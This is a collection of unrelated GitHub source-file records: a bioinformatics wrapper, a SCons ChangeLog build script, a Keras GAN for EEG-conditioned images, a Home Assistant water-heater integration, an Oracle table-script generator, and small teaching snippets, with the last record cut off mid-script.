map(int,t_re[1:3])\n\t\t\tt_strd = 0 if t_re[3]=='+' else 1\n\t\t\tres.append({'name':t_re[0],'seq':i.seq,'from':t_rng[t_strd],'to':t_rng[t_strd-1]})\n\t\tif not res:\n\t\t\tfor i in ['','.log']:\n\t\t\t\tos.rename(fn+i,'err_'+fn+i)\n\t\t#\treturn {'log':open(fn+'.log').read()}\n\t\t# remove files\n\t\tos.system('rm -rf %s*' % fn)\n\t\tos.chdir(o_path)\n\t\treturn res\n\n\tdef out(self):\n\t\t\"for commandline output, default use fasta 
output\"\n\t\tres = self.res()\n\t\tfor i in res:\n\t\t\tt_name = '%s|from|%s|to|%s' % (i['name'],i['from'],i['to'])\n\t\t\tself.args['out'].write(fasta_mini_han.fasta_mini_han.seq_o(t_name,i['seq']).fasta())\n\n\t\tself.args['out'].close()\n\nif __name__ == '__main__':\n\timport argparse\n\tparser = argparse.ArgumentParser(description = pkg.__doc__, formatter_class = argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('-i','--fasta',help='fasta file input',metavar='fasta', type=argparse.FileType('r'),default=sys.stdin)\n\tparser.add_argument('-o','--out',help='peptide output file',metavar='out', type=argparse.FileType('w'),default=sys.stdout)\n\tparser.add_argument('-c','--code',help='select a genetic code in %s, default use \"universal\".' % ','.join(codes), metavar='code',default='universal',choices=codes)\n\tparser.add_argument('-m','--multi',help='output multiple amino acid if has', action='store_true', default=False)\n\tparser.add_argument('-s','--sense',help='only output sense strand', action='store_true', default=False)\n\tparser.add_argument('-t','--tmp',help='tmp dir for cmd execute', default='./')\n\tparser.add_argument('-p','--cmd_path',help='transdecoder dir')\n\targs = parser.parse_args()\n\n\ta=pkg(vars(args))\n\ta.out()\n","repo_name":"wyubin/dockers","sub_path":"nginx_flask_python2/uwsgi/project/python/share_app/share_util/transdecoder.py","file_name":"transdecoder.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27439114667","text":"## \n## my_car.py\n## ianpasm(kno30826@gmail.com)\n## 2017-11-21 17:02:24\n## \n \n#!/usr/bin/env python3\n# coding=utf-8\n\nfrom car import Car\n\nmy_new_car = Car('audi','a7',2017)\nprint(my_new_car.get_descriptive_name())\n\nmy_new_car.odometer_reading = 23\nmy_new_car.read_odometer()\n","repo_name":"i0Ek3/PythonCrashCourse","sub_path":"code/part1/37_import_class/my_car.py","file_name":"my_car.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15007613226","text":"##Building the ChangeLog\nimport os, sys, string\nfrom time import sleep\nfrom SCons.Util import WhereIs\npj = os.path.join\n\nImport('ves_pkg', 'baseEnv', 'buildDir', 'RootDir')\nenv = ves_pkg.getEnv().Clone()\n\n##Base parameters.\nrelativeDir = pj('share', 'docs', 'changelog')\nbaseDir = pj('#', relativeDir)\n\nsrcs = Split(\"\"\"\n ChangeLog\n\"\"\")\n\nchLogSrc = map(lambda s: pj(baseDir, \"%s.xml\" %(s)), srcs)\nchLogTarget = map(lambda s: pj(baseDir, \"%s\" %(s)), srcs)\n\nif env[ 'SVN_Previous_Date' ] != '':\n sys.stdout.write(\"Generating the ChangeLog....\\n\")\nelse:\n sys.stdout.write(\"No SVN_Previous_Date defined\")\n sys.exit(0)\n \n# Find svn\nsys.stdout.write(\"searching for svn...\\n\")\nsvn_cmd = WhereIs('svn')\n\nif None == svn_cmd:\n sys.stdout.write(\"Could not find svn. Please make sure svn is in your PATH.\\n\")\n sys.exit(0)\nelse:\n sys.stdout.write(\"Found svn\\n\")\n\n# Find xsltproc\nsys.stdout.write(\"searching for xsltproc...\\n\")\nxsltproc_cmd = WhereIs('xsltproc')\n\nif None == svn_cmd:\n sys.stdout.write(\"Could not find xsltproc. 
+{"seq_id":"15007613226","text":"##Building the ChangeLog\nimport os, sys, string\nfrom time import sleep\nfrom SCons.Util import WhereIs\npj = os.path.join\n\nImport('ves_pkg', 'baseEnv', 'buildDir', 'RootDir')\nenv = ves_pkg.getEnv().Clone()\n\n##Base parameters.\nrelativeDir = pj('share', 'docs', 'changelog')\nbaseDir = pj('#', relativeDir)\n\nsrcs = Split(\"\"\"\n ChangeLog\n\"\"\")\n\nchLogSrc = map(lambda s: pj(baseDir, \"%s.xml\" %(s)), srcs)\nchLogTarget = map(lambda s: pj(baseDir, \"%s\" %(s)), srcs)\n\nif env[ 'SVN_Previous_Date' ] != '':\n sys.stdout.write(\"Generating the ChangeLog....\\n\")\nelse:\n sys.stdout.write(\"No SVN_Previous_Date defined\")\n sys.exit(0)\n \n# Find svn\nsys.stdout.write(\"searching for svn...\\n\")\nsvn_cmd = WhereIs('svn')\n\nif None == svn_cmd:\n sys.stdout.write(\"Could not find svn. Please make sure svn is in your PATH.\\n\")\n sys.exit(0)\nelse:\n sys.stdout.write(\"Found svn\\n\")\n\n# Find xsltproc\nsys.stdout.write(\"searching for xsltproc...\\n\")\nxsltproc_cmd = WhereIs('xsltproc')\n\nif None == svn_cmd:\n sys.stdout.write(\"Could not find xsltproc. Please make sure xsltproc is in your PATH.\\n\")\n sys.exit(0)\nelse:\n sys.stdout.write(\"Found xsltproc\\n\")\n\nos.system(\"%s log --xml --verbose -r'{'%s'}':'HEAD' %s > ChangeLog.xml\" % (svn_cmd, env['SVN_Previous_Date'], RootDir))\n\nxsltAction = '%s -o ${TARGET.abspath} %s/external/svn2cl/svn2cl.xsl ${SOURCE.abspath}' % (xsltproc_cmd, RootDir)\nxsltBuilder = Builder(action = xsltAction, single_source = True, suffix = \"\", chdir = relativeDir)\n\nenv.Append(BUILDERS = {'xslt': xsltBuilder})\nenv.xslt(target = chLogTarget, source = chLogSrc)\n\n#./external/svn2cl/svn2cl.sh --linelen=80 --break-before-msg=1 --title=\"VE-Suite ChangeLog\" --group-by-day --separate-daylogs --html . --revision HEAD:14782\n\nsys.stdout.write(\"ChangeLog and ChangeLog.xml files are successfully created\\n\")\n\n","repo_name":"multitudinous/ve-suite","sub_path":"share/docs/changelog/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"4434810179","text":"import string\nfrom collections import deque\n\nalphabet = string.ascii_lowercase + \" \"\n\nQ = deque(alphabet)\nQ.rotate(-3)\n\nword = \"this is a caesar cypher\"\n\nfor ch in word:\n q_ind = alphabet.index(ch)\n print(ch, Q[q_ind])\n","repo_name":"pekka-aleksi/python-snippets","sub_path":"caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"73837347000","text":"import datetime\nfrom jinja2 import Environment, FileSystemLoader\n\nenv = Environment(\n loader=FileSystemLoader(\"sql/in\"), trim_blocks=True, lstrip_blocks=True\n)\n\ntemplate = env.get_template(\"a.sql\")\n\nstart_date = \"2020-01-02\"\nend_date = (\n datetime.date.fromisoformat(start_date) + datetime.timedelta(days=30)\n).isoformat()\n\nwith open(\"sql/out/a.sql\", \"w\") as f:\n f.write(\n template.render(\n tbl=\"sold\",\n vars=[\"carrot\", \"date\"],\n start_date=start_date,\n end_date=end_date,\n )\n )\n","repo_name":"curtisalexander/jinjaexperiments","sub_path":"a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"73746753719","text":"from keras.layers.normalization import BatchNormalization\nfrom keras.layers import Dense, Flatten, Reshape, LeakyReLU, Dropout, Input, multiply\nfrom keras.layers.convolutional import Conv2D, Conv2DTranspose\nfrom keras.regularizers import l2\nfrom keras.initializers import RandomUniform\nfrom keras.layers.core import Activation\nfrom keras.models import Model\nfrom keras.engine.topology import Layer\nfrom keras import initializers\nfrom keras import regularizers\nimport keras.backend as K\n\n\nclass DeLiGANLayer(Layer):\n \"\"\"\n Layer based on the DeLiGAN.\n\n This layer allows the model to reparameterize the latent space as a (Gaussian)\n mixture model.\n \"\"\"\n\n def __init__(self,\n kernel_regularizer=None,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n **kwargs):\n \"\"\"\n Initialise the the layer.\n\n Here the initialisers and regulisars (to build the weights) are set.\n \"\"\"\n\n if 'input_shape' not in kwargs and 'input_dim' in kwargs:\n kwargs['input_shape'] = (kwargs.pop('input_dim'),)\n super(DeLiGANLayer, self).__init__(**kwargs)\n self.kernel_initializer = initializers.get(kernel_initializer)\n self.bias_initializer = initializers.get(bias_initializer)\n self.kernel_regularizer = regularizers.get(kernel_regularizer)\n\n def build(self, input_shape):\n \"\"\"\n Build the weights of the layer (__call__() automatically runs this).\n\n Allows for the lazy creation of weights once the input shape is known. This\n method builds std and mean that will be used for f(x)=x*std+mean.\n\n input: input_shape: the input shape to the layer.\n \"\"\"\n\n assert len(input_shape) >= 2\n input_dim = input_shape[-1]\n\n self.std = self.add_weight(shape=(input_dim,),\n name='std',\n initializer=self.kernel_initializer,\n regularizer=self.kernel_regularizer)\n\n self.mean = self.add_weight(shape=(input_dim,),\n initializer=self.bias_initializer,\n name='mean')\n\n self.built = True\n\n def call(self, inputs):\n \"\"\"\n The layers forward pass.\n\n input: inputs: input to the layer.\n output: output of the layer is f(input)=input*std+mean.\n \"\"\"\n\n output = inputs * self.std\n output = K.bias_add(output, self.mean)\n return output\n\n def compute_output_shape(self, input_shape):\n \"\"\"\n Computes the shape of the layer output.\n \"\"\"\n\n assert input_shape and len(input_shape) >= 2\n assert input_shape[-1]\n output_shape = list(input_shape)\n output_shape[-1] = input_shape[-1]\n return tuple(output_shape)\n\n\n\ndef build_generator(noise_dim, feature_dim):\n \"\"\"\n Builds the generator for the hybrid DeLiGAN using EEG embeddings.\n\n This generator uses the DeLiGAN approach of reparameterizing the latent space\n and then uses transposed convolutional layers to upsample to a 64x63x3 image.\n It is also a hybrid of the DeLiGAN as we use the auxiliary classifier GAN\n (AC-GAN) approach with a pretrained classifier (trained in\n image_classifier.ipynb).\n\n input: noise_dim: dimension of the noise.\n input: feature_dim: dimension of the EEG embeddings.\n return: a model that takes noise and embeddings as input and outputs a 64x63x3\n image.\n \"\"\"\n\n noise_input = Input(shape=(noise_dim,))\n eeg_embedding_input = Input(shape=(feature_dim,))\n\n # softmax the EEG embedding\n eeg_soft_max = Activation('softmax')(eeg_embedding_input)\n\n # mixture model\n x = DeLiGANLayer(\n kernel_initializer=RandomUniform(minval=-0.2, maxval=0.2),\n bias_initializer=RandomUniform(minval=-1.0, maxval=1.0),\n kernel_regularizer=l2(0.01))(noise_input)\n\n # apply a transformation to the result of the mixture model\n x = Dense(feature_dim, activation=\"tanh\")(x)\n x = multiply([x, eeg_soft_max])\n\n # standard generator\n x = BatchNormalization(momentum=0.8)(x)\n x = Dense(512 * 4 * 4, activation=\"relu\")(x)\n x = Reshape((4, 4, 512))(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = Conv2DTranspose(filters=256, kernel_size=5, strides=2, padding='same', activation='relu')(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = Conv2DTranspose(filters=128, kernel_size=5, strides=2, padding='same', activation='relu')(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = Conv2DTranspose(filters=64, kernel_size=5, strides=2, padding='same', activation='relu')(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = Conv2DTranspose(filters=3, kernel_size=5, strides=2, padding='same', activation='relu')(x)\n output = Activation(\"tanh\")(x)\n\n return Model(inputs=[noise_input, eeg_embedding_input], outputs=[output])\n\n\ndef build_discriminator(input_img_shape, classifier_model):\n \"\"\"\n Builds the discriminator.\n\n This disrciminator follows the 'hybrid' approach of the AC-GAN but with\n a pretrained classifier (trained in image_classifier.ipynb). Here we\n are using Keras' functional API with the input being a 64x64x3 image\n and the output being the prediction of real/fake, as well as the\n auxiliary output which is a prediction of the image class.\n\n input: input_img_shape: shape of the input (the image)\n input: classifier_model: pretrained classifier (predicts the image class).\n return: a model with image input and two outputs: the real/fake prediction\n and the auxiliary prediction.\n \"\"\"\n\n img_input = Input(shape=(input_img_shape[0], input_img_shape[1], 3))\n x = Conv2D(16, (3, 3), strides=2)(img_input)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.5)(x)\n x = BatchNormalization()(x)\n x = Conv2D(32, (3, 3), strides=1)(x)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.5)(x)\n x = BatchNormalization()(x)\n x = Conv2D(64, (3, 3), strides=2)(x)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.5)(x)\n x = BatchNormalization()(x)\n x = Conv2D(128, (3, 3), strides=1)(x)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.5)(x)\n x = BatchNormalization()(x)\n x = Conv2D(256, (3, 3), strides=2)(x)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.5)(x)\n x = BatchNormalization()(x)\n x = Conv2D(512, (3, 3), strides=1)(x)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.5)(x)\n x = Flatten()(x)\n\n fake = Dense(1, activation='sigmoid')(x)\n classifier_model.trainable = False\n\n # the pretrained classifier\n aux = classifier_model(inputs=[img_input])\n\n return Model(inputs=[img_input], outputs=[fake, aux])\n\n\ndef build_gan(noise_dim, feature_dim, g, d):\n \"\"\"\n The GAN model. This is the composite of both the discriminator and\n generator.\n\n This function builds the composite model, allowing the generator to\n be trained in relation to the discriminator result (i.e. generator\n trained to trick the discriminator) while the discriminator is not in\n a trainable state.\n\n input: noise_dim: dimension of the noise.\n input: feature_dim: dimension of the features (EEG embeddings).\n input: g: the generator model.\n input: d: the discriminator model.\n\n return: the composite model D(G(x,e)), for generator G, discriminator\n D, noise x and embeddings e.\n \"\"\"\n\n noise_input = Input(shape=(noise_dim,))\n eeg_embedding_input = Input(shape=(feature_dim,))\n g_output = g(inputs=[noise_input, eeg_embedding_input])\n # d.trainable = False\n fake, aux = d(inputs=[g_output])\n return Model(inputs=[noise_input, eeg_embedding_input], outputs=[fake, aux])","repo_name":"jamespeaker/conditioning-GANs-with-brain-signals","sub_path":"training_gan/models/hybrid_deligan_eeg.py","file_name":"hybrid_deligan_eeg.py","file_ext":"py","file_size_in_byte":7732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"34492633608","text":"\"\"\"Support for water heaters.\"\"\"\r\nimport logging\r\n\r\nfrom homeassistant.components.water_heater import (\r\n    WaterHeaterEntity,\r\n    STATE_GAS,\r\n    SUPPORT_AWAY_MODE,\r\n    SUPPORT_TARGET_TEMPERATURE,\r\n    SUPPORT_OPERATION_MODE,\r\n)\r\nfrom homeassistant.config_entries import ConfigEntry\r\nfrom homeassistant.const import ATTR_TEMPERATURE, STATE_OFF, UnitOfTemperature, TEMP_CELSIUS,Platform\r\nfrom homeassistant.core import HomeAssistant\r\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\r\nfrom homeassistant.helpers.entity import DeviceInfo\r\n\r\nfrom . import async_register_entity\r\nfrom .coordinator import DeviceCoordinator\r\nfrom .core.attribute import HaierAttribute\r\nfrom .core.device import HaierDevice\r\nfrom .entity import HaierAbstractEntity\r\nfrom .helpers import try_read_as_bool\r\n\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\nSUPPORT_FLAGS = (\r\n    SUPPORT_AWAY_MODE | SUPPORT_TARGET_TEMPERATURE | SUPPORT_OPERATION_MODE\r\n)\r\n\r\n\r\nasync def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry, async_add_entities) -> None:\r\n    await async_register_entity(\r\n        hass,\r\n        entry,\r\n        async_add_entities,\r\n        Platform.WATER_HEATER,\r\n        lambda coordinator, device, attribute: HaierWaterHeater(coordinator, device, attribute)\r\n    )\r\n\r\n\r\nclass HaierWaterHeater(HaierAbstractEntity,WaterHeaterEntity):\r\n\r\n    def __init__(self, coordinator: DeviceCoordinator, device: HaierDevice, attribute: HaierAttribute):\r\n        super().__init__(coordinator, device, attribute)\r\n        self._attr_temperature_unit = TEMP_CELSIUS\r\n        self._attr_supported_features = SUPPORT_FLAGS\r\n        # 默认的0-70温度范围太宽,homekit不支持\r\n        self._attr_min_temp = 35\r\n        self._attr_max_temp = 50\r\n\r\n    @property\r\n    def operation_list(self):\r\n        \"\"\"List of available operation modes.\"\"\"\r\n        return [STATE_OFF, STATE_GAS]\r\n    \r\n\r\n    def set_temperature(self, **kwargs) -> None:\r\n        self._send_command({\r\n            'targetTemp': kwargs['temperature']\r\n        })\r\n\r\n    def _update_value(self):\r\n        if 'outWaterTemp' in self.coordinator.data:\r\n            self._attr_current_temperature = float(self.coordinator.data['outWaterTemp'])\r\n\r\n        self._attr_target_temperature = float(self.coordinator.data['targetTemp'])\r\n\r\n        if not try_read_as_bool(self.coordinator.data['onOffStatus']):\r\n            # 关机状态\r\n            self._attr_current_operation = STATE_OFF\r\n            self._attr_is_away_mode_on = True\r\n        else:\r\n            # 开机状态\r\n            self._attr_current_operation = STATE_GAS\r\n            self._attr_is_away_mode_on = False\r\n    \r\n    def turn_away_mode_on(self):\r\n        \"\"\"Turn away mode on.\"\"\"\r\n        self._send_command({\r\n            'onOffStatus': False\r\n        })\r\n\r\n    def turn_away_mode_off(self):\r\n        \"\"\"Turn away mode off.\"\"\"\r\n        self._send_command({\r\n            'onOffStatus': True\r\n        })\r\n\r\n    def set_operation_mode(self,operation_mode):\r\n        \"\"\"Set operation mode\"\"\"\r\n        if operation_mode == STATE_GAS:\r\n            power_state = True\r\n        else:\r\n            power_state = False\r\n        self._send_command({\r\n            'onOffStatus': power_state\r\n        })","repo_name":"banto6/haier","sub_path":"custom_components/haier/water_heater.py","file_name":"water_heater.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":253,"dataset":"github-code","pt":"40"}
+{"seq_id":"41635277626","text":"from typing import Callable, Dict, List, Optional, Tuple, Union\n\nfrom watchmen_model.admin import Factor, FactorType, is_aggregation_topic, is_raw_topic, Topic\nfrom watchmen_storage import as_table_name\nfrom watchmen_utilities import ArrayHelper, is_blank, is_not_blank\n\n\n# noinspection DuplicatedCode\ndef ask_column_name(factor: Factor) -> str:\n\treturn factor.name.strip().lower().replace('.', '_').replace('-', '_').replace(' ', '_')\n\n\ndef varchar_column(precision: str) -> str:\n\treturn f'VARCHAR2({precision})'\n\n\ndef varchar_10(precision: Optional[str] = '10') -> str:\n\treturn varchar_column('10' if is_blank(precision) else precision)\n\n\ndef varchar_20(precision: Optional[str] = '20') -> str:\n\treturn varchar_column('20' if is_blank(precision) else precision)\n\n\ndef varchar_50(precision: Optional[str] = '50') -> str:\n\treturn varchar_column('50' if is_blank(precision) else precision)\n\n\ndef varchar_100(precision: Optional[str] = '100') -> str:\n\treturn varchar_column('100' if is_blank(precision) else precision)\n\n\ndef varchar_255(precision: Optional[str] = '255') -> str:\n\treturn varchar_column('255' if is_blank(precision) else precision)\n\n\ndef decimal_column(precision: str) -> str:\n\treturn f'NUMBER({precision})'\n\n\ndef decimal_10_2(precision: Optional[str] = '10,2') -> str:\n\treturn decimal_column('10,2' if is_blank(precision) else precision)\n\n\ndef decimal_32_6(precision: Optional[str] = '32,6') -> str:\n\treturn decimal_column('32,6' if is_blank(precision) else precision)\n\n\nFactorTypeMap: Dict[FactorType, Union[str, Callable[[Optional[str]], str]]] = {\n\tFactorType.SEQUENCE: 'NUMBER(20)',\n\n\tFactorType.NUMBER: decimal_32_6,\n\tFactorType.UNSIGNED: decimal_32_6,\n\n\tFactorType.TEXT: varchar_255,\n\n\t# address\n\tFactorType.ADDRESS: 'VARCHAR2(1024)',\n\tFactorType.CONTINENT: varchar_10,\n\tFactorType.REGION: varchar_10,\n\tFactorType.COUNTRY: varchar_10,\n\tFactorType.PROVINCE: varchar_10,\n\tFactorType.CITY: varchar_10,\n\tFactorType.DISTRICT: varchar_255,\n\tFactorType.ROAD: varchar_255,\n\tFactorType.COMMUNITY: varchar_100,\n\tFactorType.FLOOR: 'NUMBER(5)',\n\tFactorType.RESIDENCE_TYPE: varchar_10,\n\tFactorType.RESIDENTIAL_AREA: decimal_10_2,\n\n\t# contact electronic\n\tFactorType.EMAIL: varchar_100,\n\tFactorType.PHONE: varchar_50,\n\tFactorType.MOBILE: varchar_50,\n\tFactorType.FAX: varchar_50,\n\n\t# date time related\n\tFactorType.DATETIME: 'DATE',\n\tFactorType.FULL_DATETIME: 'DATE',\n\tFactorType.DATE: 'DATE',\n\tFactorType.TIME: 'DATE',\n\tFactorType.YEAR: 'NUMBER(5)',\n\tFactorType.HALF_YEAR: 'NUMBER(3)',\n\tFactorType.QUARTER: 'NUMBER(3)',\n\tFactorType.MONTH: 'NUMBER(3)',\n\tFactorType.HALF_MONTH: 'NUMBER(3)',\n\tFactorType.TEN_DAYS: 'NUMBER(3)',\n\tFactorType.WEEK_OF_YEAR: 'NUMBER(3)',\n\tFactorType.WEEK_OF_MONTH: 'NUMBER(3)',\n\tFactorType.HALF_WEEK: 'NUMBER(3)',\n\tFactorType.DAY_OF_MONTH: 'NUMBER(3)',\n\tFactorType.DAY_OF_WEEK: 'NUMBER(3)',\n\tFactorType.DAY_KIND: 'NUMBER(3)',\n\tFactorType.HOUR: 'NUMBER(3)',\n\tFactorType.HOUR_KIND: 'NUMBER(3)',\n\tFactorType.MINUTE: 'NUMBER(3)',\n\tFactorType.SECOND: 'NUMBER(3)',\n\tFactorType.MILLISECOND: 'NUMBER(3)',\n\tFactorType.AM_PM: 'NUMBER(3)',\n\n\t# individual\n\tFactorType.GENDER: varchar_10,\n\tFactorType.OCCUPATION: varchar_10,\n\tFactorType.DATE_OF_BIRTH: 'DATE',\n\tFactorType.AGE: 'NUMBER(5)',\n\tFactorType.ID_NO: varchar_50,\n\tFactorType.RELIGION: varchar_10,\n\tFactorType.NATIONALITY: varchar_10,\n\n\t# organization\n\tFactorType.BIZ_TRADE: varchar_10,\n\tFactorType.BIZ_SCALE: 'NUMBER(9)',\n\n\tFactorType.BOOLEAN: 'NUMBER(1)',\n\n\tFactorType.ENUM: varchar_20,\n\n\tFactorType.OBJECT: 'CLOB',\n\tFactorType.ARRAY: 'CLOB'\n}\n\n\ndef ask_column_type(factor: Factor) -> str:\n\tcolumn_type = FactorTypeMap.get(factor.type)\n\tif isinstance(column_type, str):\n\t\treturn column_type\n\telif is_blank(factor.precision):\n\t\treturn column_type()\n\telse:\n\t\treturn column_type(factor.precision.strip())\n\n\ndef build_columns(topic: Topic) -> str:\n\tif is_raw_topic(topic):\n\t\tflatten_factors = ArrayHelper(topic.factors) \\\n\t\t\t.filter(lambda x: x.flatten) \\\n\t\t\t.map(lambda x: f'\\t{ask_column_name(x)} {ask_column_type(x)},') \\\n\t\t\t.to_list()\n\t\tif len(flatten_factors) == 0:\n\t\t\treturn '\\tdata_ CLOB,'\n\t\telse:\n\t\t\treturn '\\n'.join(flatten_factors) + '\\n\\tdata_ CLOB,'\n\telse:\n\t\treturn ArrayHelper(topic.factors) \\\n\t\t\t.filter(lambda x: '.' not in x.name) \\\n\t\t\t.map(lambda x: f'\\t{ask_column_name(x)} {ask_column_type(x)},') \\\n\t\t\t.join('\\n')\n\n\n# noinspection DuplicatedCode\ndef build_aggregate_assist_column(topic: Topic) -> str:\n\treturn f'\\taggregate_assist_ VARCHAR2(1024),' if is_aggregation_topic(topic) else ''\n\n\ndef build_version_column(topic: Topic) -> str:\n\treturn f'\\tversion_ NUMBER(8),' if is_aggregation_topic(topic) else ''\n\n\n# noinspection SqlResolve,DuplicatedCode\ndef build_columns_script(topic: Topic, original_topic: Topic) -> List[str]:\n\tentity_name = as_table_name(topic)\n\toriginal_factors: Dict[str, Factor] = ArrayHelper(original_topic.factors) \\\n\t\t.to_map(lambda x: x.name.strip().lower(), lambda x: x)\n\n\t# noinspection SqlResolve\n\tdef build_column_script(factor: Tuple[Factor, Optional[Factor]]) -> str:\n\t\tcurrent_factor, original_factor = factor\n\t\tif original_factor is None:\n\t\t\treturn f'ALTER TABLE {entity_name} ADD ({ask_column_name(factor[0])} {ask_column_type(factor[0])})'\n\t\telif current_factor.flatten and not original_factor.flatten:\n\t\t\treturn f'ALTER TABLE {entity_name} ADD ({ask_column_name(factor[0])} {ask_column_type(factor[0])})'\n\t\telse:\n\t\t\treturn f'ALTER TABLE {entity_name} MODIFY ({ask_column_name(factor[0])} {ask_column_type(factor[0])})'\n\n\tif is_raw_topic(topic):\n\t\tfactors = ArrayHelper(topic.factors) \\\n\t\t\t.filter(lambda x: x.flatten) \\\n\t\t\t.to_list()\n\telse:\n\t\tfactors = topic.factors\n\n\tcolumns = ArrayHelper(factors) \\\n\t\t.map(lambda x: (x, original_factors.get(x.name.strip().lower()))) \\\n\t\t.map(build_column_script) \\\n\t\t.to_list()\n\n\tif is_raw_topic(topic) and not is_raw_topic(original_topic):\n\t\tcolumns.append(f'ALTER TABLE {entity_name} ADD COLUMN data_ CLOB')\n\n\tif is_aggregation_topic(topic) and not is_aggregation_topic(original_topic):\n\t\tcolumns.append(f'ALTER TABLE {entity_name} ADD COLUMN aggregate_assist_ VARCHAR2(1024)')\n\t\tcolumns.append(f'ALTER TABLE {entity_name} ADD COLUMN version_ NUMBER(8)')\n\n\treturn columns\n\n\ndef build_unique_indexes_script(topic: Topic) -> List[str]:\n\tindex_groups: Dict[str, List[Factor]] = ArrayHelper(topic.factors) \\\n\t\t.filter(lambda x: is_not_blank(x.indexGroup) and x.indexGroup.startswith('u-')) \\\n\t\t.group_by(lambda x: x.indexGroup)\n\n\t# noinspection SqlResolve\n\tdef build_unique_index(factors: List[Factor], index: int) -> str:\n\t\treturn \\\n\t\t\tf'CREATE UNIQUE INDEX u_{as_table_name(topic)}_{index + 1} ON {as_table_name(topic)} ' \\\n\t\t\tf'({ArrayHelper(factors).map(lambda x: ask_column_name(x)).join(\",\")})'\n\n\treturn ArrayHelper(list(index_groups.values())) \\\n\t\t.map_with_index(lambda x, index: build_unique_index(x, index)).to_list()\n\n\ndef build_indexes_script(topic: Topic) -> List[str]:\n\tindex_groups: Dict[str, List[Factor]] = ArrayHelper(topic.factors) \\\n\t\t.filter(lambda x: is_not_blank(x.indexGroup) and x.indexGroup.startswith('i-')) \\\n\t\t.group_by(lambda x: x.indexGroup)\n\n\t# noinspection SqlResolve\n\tdef build_index(factors: List[Factor], index: int) -> str:\n\t\treturn \\\n\t\t\tf'CREATE INDEX u_{as_table_name(topic)}_{index + 1} ON {as_table_name(topic)} ' \\\n\t\t\tf'({ArrayHelper(factors).map(lambda x: ask_column_name(x)).join(\",\")})'\n\n\treturn ArrayHelper(list(index_groups.values())) \\\n\t\t.map_with_index(lambda x, index: build_index(x, index)).to_list()\n\n\ndef build_table_script(topic: Topic) -> str:\n\tentity_name = as_table_name(topic)\n\t# noinspection SqlType\n\tscript = f'''\nCREATE TABLE {entity_name} (\n\\tid_ NUMBER(20),\n{build_columns(topic)}\n{build_aggregate_assist_column(topic)}\n{build_version_column(topic)}\n\\ttenant_id_ VARCHAR2(50),\n\\tinsert_time_ DATE,\n\\tupdate_time_ DATE,\n\\tCONSTRAINT pk_{entity_name} PRIMARY KEY (id_)\n)'''\n\treturn script\n","repo_name":"Indexical-Metrics-Measure-Advisory/watchmen","sub_path":"packages/watchmen-storage-oracle/src/watchmen_storage_oracle/table_creator.py","file_name":"table_creator.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"}
+{"seq_id":"31958427493","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\nimport os\n\nplt.rcParams.update({\n 'text.usetex': True,\n 'figure.dpi': 150})\n\nplt.tight_layout()\n\ndef getsweepdata(sweepdir):\n\n cwd = os.getcwd()\n files = os.listdir(sweepdir)\n files = np.array(files)\n coefficients = np.zeros((len(files),3))\n angles = np.arange(-8, 18, 2)\n\n sfiles = [ifile.replace(\"GRTsteady\", \"\") for ifile in files]\n sfiles = np.array([ifile.replace(\"Mesh8\", \"\") for ifile in sfiles]).astype(int)\n #print(sfiles)\n\n files = files[sfiles.argsort()]\n #print(files)\n\n for i, file in enumerate(files):\n os.chdir(os.path.join(sweepdir,file))\n coefs = np.loadtxt(\"postProcessing/forceCoeffs/0/forceCoeffs.dat\", skiprows=9 , delimiter=\"\\t\")\n coefsmean = np.mean(coefs[-300:-100], axis=0)\n #print(coefs)\n coefficients[i, 1] = coefsmean[2]\n coefficients[i, 2] = coefsmean[3]\n os.chdir(cwd)\n\n return sorted(files), coefficients, angles\n\ndef get_coefficients(resultsdir):\n\n airdict = {}\n cwd = os.getcwd()\n\n fig1, ax1 = plt.subplots(figsize=(7,5), dpi=150)\n ax1.set_axisbelow(True)\n fig2, ax2 = plt.subplots(figsize=(7,5), dpi=150)\n ax2.set_axisbelow(True)\n fig3, ax3 = plt.subplots(figsize=(7,5), dpi=150)\n ax3.set_axisbelow(True)\n\n for i, sweepdir in enumerate(sorted(os.listdir(resultsdir))):\n\n os.chdir(os.path.join(resultsdir, sweepdir))\n _, coef, angles = getsweepdata(os.getcwd())\n angles = angles[angles!=-6.]\n angles = angles[angles!=-8.]\n coef = coef[2:-2]\n\n airdict[\"mod\"+str(i)+\"lift\"] = coef[:,2]\n airdict[\"mod\"+str(i)+\"drag\"] = coef[:,1]\n\n ax1.plot(angles, coef[:, 1], marker='.', label='SG6043 mod'+str(i))\n ax1.set_ylabel(r\"$C_\\mathrm{drag}$\")\n ax1.set_xlabel(r\"Angle of attack $[^\\circ]$\")\n ax2.plot(angles, coef[:, 2], marker='.', 